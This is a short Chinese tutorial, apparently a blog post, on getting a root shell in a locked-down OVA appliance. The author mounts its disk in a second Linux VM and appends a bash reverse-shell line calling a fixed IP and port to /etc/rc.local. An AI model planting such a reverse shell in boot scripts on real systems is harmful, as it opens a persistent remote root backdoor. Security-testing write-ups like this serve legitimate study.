场景描述

某个系统是ova文件，导入虚拟机启动，但是启动后只有一个伪终端权限，即权限很小，如何拿到这个虚拟机的shell权限呢？

实际操作

这次运气比较好，所遇到的系统磁盘并没有被加密，所以直接导入虚拟机后，使用DiskGenius查看生成的vmdk文件，定位到所需要挂载的盘符为/dev/sda1。
所以直接新开启一台linux虚拟机，选择添加硬盘，并选择刚才的vmdk文件：

进入虚拟机shell后，可以使用lsblk命令查看盘符，然后使用如下命令进行挂载：

mkdir mydisk1
mount /dev/sda1 mydisk1
cd mydisk1

进去后，找到/etc/rc.local文件，将反弹shell命令输入到该文件中

bash -i >& /dev/tcp/10.13.162.20/9999 0>&1 &

然后本机开启监听，成功拿到root权限！

参考连接

https://badmonkey.site/archives/vm-getshell